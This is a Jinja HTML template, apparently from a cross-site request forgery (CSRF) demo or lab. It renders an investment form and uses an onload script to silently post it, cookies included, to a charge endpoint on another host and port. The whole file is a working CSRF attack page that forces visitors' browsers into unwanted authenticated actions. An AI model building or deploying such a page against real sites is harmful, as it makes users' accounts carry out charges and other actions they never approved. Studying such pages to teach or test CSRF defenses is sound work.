{% extends "base.html" %}

{% block head %}
    {{ super() }}
    <title>Form</title>
{% endblock %}

{% block body %}
    {{ auth }}
    <br>
    <form name=charge action="http://{{ host }}:{{ port_2 }}/charge" method='post'>
        How much do you want to invest <br>
        <input type="number" required="required" name="cake" value="100"> <br>
        <input type="submit" value="POST">
    </form>

    <script>
        window.onload = function() {
            setTimeout(autoSend, 10)
        };
        function autoSend(){
            let
                oldForm = document.forms.charge,
                formData = new FormData(oldForm),
                url = oldForm.getAttribute('action'),
                method = oldForm.getAttribute('method')
                ;
            fetch(url, {
                method: method,
                body: formData,
                mode: 'no-cors',
                credentials: 'include',
                headers: {'Content-Type': 'text/html'},
            });
        };
    </script>
{% endblock %}
